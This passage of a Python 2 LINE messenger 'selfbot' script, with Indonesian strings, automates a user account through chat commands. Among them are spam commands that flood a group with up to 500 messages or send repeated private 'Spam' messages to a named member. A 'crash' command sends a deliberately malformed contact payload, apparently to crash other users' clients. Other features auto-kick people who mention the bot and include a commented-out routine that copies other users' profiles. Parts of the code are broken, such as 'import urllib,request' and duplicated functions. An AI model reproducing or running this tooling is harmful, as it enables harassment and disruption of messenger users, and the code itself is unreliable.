╠->Gbroadcast:
╠->Cbroadcast:
╠->Infogrup
╠->Gruplist
╠->Friendlist
╠->Blacklist
╠->Ban @
╠->Unban @
╠->Clearban
╠->Banlist
╠->Contact ban
╠->Midban
╚═════════════════"""
helptranslate ="""
╠═════════════════
╠->Id@en
╠->En@id
╠->Id@jp
╠->Jp@id
╠->Id@th
╠->Th@id
╠->Id@ar
╠->Ar@id
╠->Id@ko
╠->Ko@id
╠->Say-id
╠->Say-en
╠->Say-jp
╚═════════════════"""
KAC=[cl]
mid = cl.getProfile().mid
Bots=[mid]
wait = {
"likeOn":False,
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":True,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":5},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"""Thx for add""",
"lang":"JP",
"comment":"",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames":"",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Don't Tag Me! iam Bussy!, ",cName + "Ada perlu naon, ?",cName + " pc aja klo urgent! sedang sibuk,", "kenapa, ", cName + " kangen?","kangen bilang gausa tag tag, " + cName, "knp?, " + cName, "apasi?, " + cName + "?", "pulang gih, " + cName + "?","aya naon, ?" + cName + "Tersummon -_-"]
ret_ = "." + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Puy lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., ", "Tersummon -_-, "]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
cl.sendText(msg.to,"Error")
wait['invite'] = False
break
#if msg.contentType == 13:
# if wait["steal"] == True:
# _name = msg.contentMetadata["displayName"]
# copy = msg.contentMetadata["mid"]
# groups = cl.getGroup(msg.to)
# pending = groups.invitee
# targets = []
# for s in groups.members:
# if _name in s.displayName:
# print "[Target] Stealed"
# break
# else:
# targets.append(copy)
# if targets == []:
# pass
# else:
# for target in targets:
# try:
# cl.findAndAddContactsByMid(target)
# contact = cl.getContact(target)
# cu = cl.channel.getCover(target)
# path = str(cu)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
# cl.sendText(msg.to,"Profile Picture " + contact.displayName)
# cl.sendImageWithURL(msg.to,image)
# cl.sendText(msg.to,"Cover " + contact.displayName)
# cl.sendImageWithURL(msg.to,path)
# wait["steal"] = False
# break
# except:
# pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Nothing")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Not in Blacklist")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpmsg)
else:
cl.sendText(msg.to,helpmsg)
elif msg.text.lower() == 'help protect':
if wait["lang"] == "JP":
cl.sendText(msg.to,helppro)
else:
cl.sendText(msg.to,helppro)
elif msg.text.lower() == 'help self':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpself)
else:
cl.sendText(msg.to,helpself)
elif msg.text.lower() == 'help grup':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpgrup)
else:
cl.sendText(msg.to,helpgrup)
elif msg.text.lower() == 'help set':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpset)
else:
cl.sendText(msg.to,helpset)
elif msg.text.lower() == 'help translate':
if wait["lang"] == "JP":
cl.sendText(msg.to,helptranslate)
else:
cl.sendText(msg.to,helptranslate)
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "「Come Here」")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
elif msg.text.lower() == 'crash':
msg.contentType = 13
msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"}
cl.sendMessage(msg)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif ".fb" in msg.text:
a = msg.text.replace(".fb","")
b = urllib.quote(a)
cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses")
cl.sendText(msg.to, "https://www.facebook.com" + b)
cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses")
#========================== FOR COMMAND BOT STARTING =============================#
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protecion Already On")
else:
cl.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protecion Already On")
else:
cl.sendText(msg.to,"Protecion Already On")
elif msg.text.lower() == 'qr on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already On")
else:
cl.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already On")
else:
cl.sendText(msg.to,"Protection Qr already On")
elif msg.text.lower() == 'invite on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite already On")
else:
cl.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
elif msg.text.lower() == 'cancel on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
elif msg.text.lower() == 'protect off':
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection already Off")
else:
cl.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
cl.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
elif msg.text.lower() == 'qr off':
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already off")
else:
cl.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Qr already Off")
else:
cl.sendText(msg.to,"Protection Qr already Off")
elif msg.text.lower() == 'invit off':
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite already Off")
else:
cl.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Invite already Off")
else:
cl.sendText(msg.to,"Protection Invite already Off")
elif msg.text.lower() == 'cancel off':
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Cancel already Off")
else:
cl.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Cancel already Off")
else:
cl.sendText(msg.to,"Protection Cancel already Off")
elif "Grup cancel:" in msg.text:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
cl.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar")
else:
cl.sendText(msg.to,"Weird value")
elif msg.text.lower() == 'autoleave on':
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to on")
else:
cl.sendText(msg.to,"Auto Leave room already on")
elif msg.text.lower() == 'autoleave off':
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave room set to off")
else:
cl.sendText(msg.to,"Auto Leave room already off")
elif msg.text.lower() == 'share on':
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to on")
else:
cl.sendText(msg.to,"Share already on")
elif msg.text.lower() == 'share off':
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Share set to off")
else:
cl.sendText(msg.to,"Share already off")
elif msg.text.lower() == 'status':
md = ""
if wait["contact"] == True: md+="Contact:on \n"
else: md+="Contact:off\n"
if wait["autoJoin"] == True: md+="Auto Join:on \n"
else: md +="Auto Join:off\n"
if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel:off \n"
if wait["leaveRoom"] == True: md+="Auto leave:on \n"
else: md+="Auto leave:off \n"
if wait["timeline"] == True: md+="Share:on \n"
else:md+="Share:off \n"
if wait["autoAdd"] == True: md+="Auto add:on \n"
else:md+="Auto add:off \n"
if wait["protect"] == True: md+="Protect:on \n"
else:md+="Protect:off \n"
if wait["linkprotect"] == True: md+="Link Protect:on \n"
else:md+="Link Protect:off \n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on \n"
else:md+="Invitation Protect:off \n"
if wait["cancelprotect"] == True: md+="Cancel Protect:on \n"
else:md+="Cancel Protect:off \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"}
cl.sendMessage(msg)
elif msg.text.lower() == 'autoadd on':
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to on")
else:
cl.sendText(msg.to,"Auto add already on")
elif msg.text.lower() == 'autoadd off':
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto add set to off")
else:
cl.sendText(msg.to,"Auto add already off")
elif "Pesan set:" in msg.text:
wait["message"] = msg.text.replace("Pesan set:","")
cl.sendText(msg.to,"We changed the message")
elif msg.text.lower() == 'pesan cek':
if wait["lang"] == "JP":
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di")
else:
cl.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Comment Actived")
else:
cl.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off")
else:
cl.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklist")
else:
cl.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam set on")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Jam")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
#========================== FOR COMMAND BOT FINISHED =============================#
elif "Spam change:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.toType == 2:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#=====================================
elif "Spam " in msg.text:
if msg.toType == 2:
bctxt = msg.text.replace("Spam ", "")
t = cl.getAllContactIds()
t = 500
while(t):
cl.sendText(msg.to, (bctxt))
t-=1
#==============================================
elif "Spamcontact @" in msg.text:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
cl.sendText(g.mid,"Spam")
